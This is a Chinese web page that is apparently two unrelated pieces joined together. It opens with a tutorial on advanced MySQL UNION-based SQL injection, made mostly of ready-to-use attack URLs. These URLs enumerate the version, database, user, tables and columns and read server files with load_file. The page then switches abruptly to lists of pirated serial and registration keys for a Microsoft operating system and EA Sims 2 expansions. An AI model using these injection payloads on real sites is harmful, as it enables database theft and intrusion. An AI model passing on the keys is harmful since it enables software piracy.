体验盒子

-------------------------------------
#MYSQL高级注入实例
-------------------------------------
By xnquan

– 系统信息–

http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 1,2,version(),4,5
http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 1,2,database(),4,5
http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 1,2,user(),4,5

– 爆数据库的表–

http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 0,0,concat(table_name),0,0 from (select * from (select * from information_schema.tables where table_schema=0×61797363 order by table_schema limit 0,1) t order by table_schema desc)t limit 1– /0×61797363是爆出的数据库aysc（database()）的16进制 爆出位置0的表 注意从0开始

http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 0,0,concat(table_name),0,0 from (select * from (select * from information_schema.tables where table_schema=0×61797363 order by table_schema limit 2,1) t order by table_schema desc)t limit 1– /爆出位置2的表

http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 0,0,concat(table_name),0,0 from (select * from (select * from information_schema.tables where table_schema=0×61797363 order by table_schema limit 10,1) t order by table_schema desc)t limit 1– /爆出位置10的表

– 爆出字段–

http://www.vulnsite.com//renwu.php?id=10 and 1=2 union select 0,0,concat(cast(count(*) as char)),0,0 from information_schema.columns where table_name=0x6364625f696d6167657479706573 and table_schema=0×61797363 limit 1– /0x6364625f696d6167657479706573是选择一个表 0×61797363是数据库账户 16进制
//爆出含有多少字段

http://www.vulnsite.com//renwu.php?id=10 and 1=2 union select 0,0,concat(column_name),0,0 from (select * from (select * from information_schema.columns where table_name=0x6364625f696d6167657479706573 and table_schema=0×61797363 order by 1 limit 0,1) t order by 1 desc)t limit 1–
//爆出数据库账户 0×61797363 中的表 0x6364625f696d6167657479706573 的 0 位置 的字段 （必须转换16进制）

http://www.vulnsite.com//renwu.php?id=10 and 1=2 union select 0,0,concat(column_name),0,0 from (select * from (select * from information_schema.columns where table_name=0x6364625f696d6167657479706573 and table_schema=0×61797363 order by 1 limit 1,1) t order by 1 desc)t limit 1–

// 爆出数据库账户 0×61797363 中的表 0x6364625f696d6167657479706573 的 1 位置 的字段 （必须转换16进制）

– 爆出数据数据–

联合查询
这个不说了
– 跨库？得到数据库账户？–
参考我的教程 php注入爆数据库账户
http://u.115.com/file/f86e56c2cb

– 读数据文件–

/renwu.php?id=10 and 1=2 union select 0,0,concat(load_file(16进制的地址)),0,0 –

Reference:
[1]http://www.ptsecurity.com/download/PT-devteev-FAST-blind-SQL-Injection.pdf

类型：操作系统
发布日期：2008-01-01
支持平台：所有
开发公司：微软

序列号/注册码

DP7CM-PD6MC-6BKXT-M8JJ6-RPXGJ
F4297-RCWJP-P482C-YY23Y-XH8W3
HH7VV-6P3G9-82TWK-QKJJ3-MXR96
HCQ9D-TVCWX-X9QRG-J4B2Y-GR2TT
QC986-27D34-6M3TY-JJXP9-TBGMD
MRX3F-47B9T-2487J-KWKMF-RPWBY
CBWD9-KT7P2-Y6D3F-3QBJM-HB4WW
F4C97-DQC7M-97WF7-W2YXB-4JFW3
F4JBF-9TV7P-4FBBV-DWYGC-QJQ2W
F6Q6V-77KGG-3KVQ6-2RMQG-8BTR6
FVGJR-KMVKQ-VJBDY-TKF2R-T6C4W
GYCTC-QJQRV-DMFYW-T9864-MDKFT
HJCJ2-F3BJ8-BWBKG-YKBDP-PRRWM
HJD9Y-9QXDW-YD6F8-MQTW2-QJQYY
MRQH8-686GB-2K623-6MXVF-H2P4Q
QMHVG-7VKBM-BXD4H-G96CP-F826G
V4G67-QM2Y4-C67GP-P89BP-2PD2Y

版本：所有
类型：游戏娱乐
发布日期：2009-01-01
支持平台：Windows
开发公司：EA

序列号/注册码

XVSA-24UG-G34W-NG32-YRLD
UCRR-NGZX-HTD3-CHTE-5RLD
9U88-Z2QX-FJ9S-6FJH-TRLD
ZLZR-HL2M-3NM4-W3N4-7RLD
7W5D-MLWY-X4KX-JX4K-ZRLD

安装所需序列号：

■非常派对
S2QG-BJ2C-9VJ5-49VJ-9RLD
JMF7-MLQL-DGAU-YDGA-YRLD
JWW6-SSJQ-5LAN-T5LA-SRLD
264L-XJEA-NT2J-ZNT2-NRLD

■缤纷四季
MDXX-MZZM-FXJZ-CF5K-5E4Y
555D-ACPY-G86A-QQKW-K3RR
Z7J2-RQRL-HUN6-UC8T-T32N

■宠物当家
UY3K-KYK6-U5AH-7DH6-RZKB
UBH9-VMN3-7CY8-XP6M-3NQH
NJU4-QP5P-E36A-U9PV-GMR4
SUDD-PU8V-3JJM-6ME9-HWKH

■魅力生活

YYAA-W5AG-Y0Z0-49I0-1911
JZ3K-4ZQA-J9Q0-T0Y1-1911
JFV5-HBYQ-A9Y8-31R8-1911
Z2S2-KUYF-Q9A8-E8R0-1911
IDZH-BNQ2-R8R0-D8Z9-1911
IGUL-RLJU-Z9A9-68I0-1911

■欢乐家庭：
F4EN-XDGJ-8HWJ-F8HV-MRLD
7A6N-7ZZM-6MD2-M6MM-3RLD
WWGG-PTUR-S8TV-GS8H-XRLD
GCBB-3G2E-BB34-MBB4-6RLD
N9V5-HZT4-BWWU-QBWK-WRLD

■创业：
XVSA-24UG-G34W-NG32-YRLD
UCRR-NGZX-HTD3-CHTE-5RLD
9U88-Z2QX-FJ9S-6FJH-TRLD
ZLZR-HL2M-3NM4-W3N4-7RLD
7W5D-MLWY-X4KX-JX4K-ZRLD

■夜生活：

NJ99-FNBL-7DEV-6A24-QDEV
RP77-LS3G-ADEV-YUUK-GDEV
9KRZ-BBWX-LDEV-Q0CX-1DEV
5BKT-DZ5Z-TDEV-CTI3-DDEV

■大学生活：

R44C-HRNL-VUCT-8WAZ-U1G9
6PFX-W8AH-MVNG-X90X-F4JH
SPQQ-KC0R-NVNG-ZB8D-K4A4
IENW-DVBZ-YVNG-RO3O-A4ET

■sims2 ：

BKUL-CS68-J6AT-37Y7-KX4F